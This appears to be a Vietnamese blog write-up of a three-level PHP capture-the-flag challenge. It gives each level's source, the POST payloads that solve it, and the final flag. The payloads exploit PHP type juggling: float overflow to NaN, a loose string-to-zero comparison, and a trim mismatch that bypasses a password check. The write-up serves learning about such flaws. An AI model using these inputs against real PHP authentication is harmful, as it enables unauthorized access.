![[IMG]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vjZIICVGl4pD3WPcZnbnIqQH6dsfVrfEdSoW54SLkdNm9Nx5byVdkjiuxpZg5PwuNaDCU1fXvSVHjcGLA0orJ6Uu0uwRJoeFS0lXMX6iy6WpwjMVA30KODH0hRbnEj23bhM-P5fWvvfA6IeQ7VRd-kVa7EV5rQpP2GFK55RFb3=s0-d)
Có 3 level mình copy source của nó luôn, mỗi lần go_next(); là sẽ hiện ra link level tiếp theo
================================
Level 1: The starter
if (isset($_POST['submit'])) {
$n1 = $_POST['a'].'';
$n2 = $_POST['b'].'';
if ( is_numeric($n1) && is_numeric($n2) && ($n1+$n2!==INF) && !is_numeric(($n1 + $n2).'' ) ) {
go_next();
}
}
Solution:
a=5e2222&b=-5e2222&submit=Submit
================================
Level 2: The Elite
if (isset($_POST['submit'])) {
$n1 = $_POST['a'];
$n2 = $_POST['b'];
$n1 = (float)$n1 / 13.370 + 12.388;
$n2 = (float)$n2 / 88.123 + 70.133;
$float=($n1 && $n2)?$n1+$n2:1337;
if ($float == 'float' ){ #Chỗ này nếu "float" (string) khi đc compare == với (float)0 thì nó sẽ đc cast về 0
go_next();
}
}
Solution:
a=-1103.30577&b=a&submit=Submit
==================================
http://118.102.7.229:5482/c7fb5a03c0.php
Level 3: The Authentication
$auth = Array( "admin" => VERYVERYVERYLONGSTRING );
if (isset($_POST['submit'])) {
if (trim($_POST['user']) != 'admin' ) die('wrong user' );
if ($auth[$_POST['user']] == $_POST['pass']){
go_next();
}
}
Solution:
user=%20admin&pass=&submit=Submit
Flag: W3AreInLoveWithPHP
0 nhận xét:
Đăng nhận xét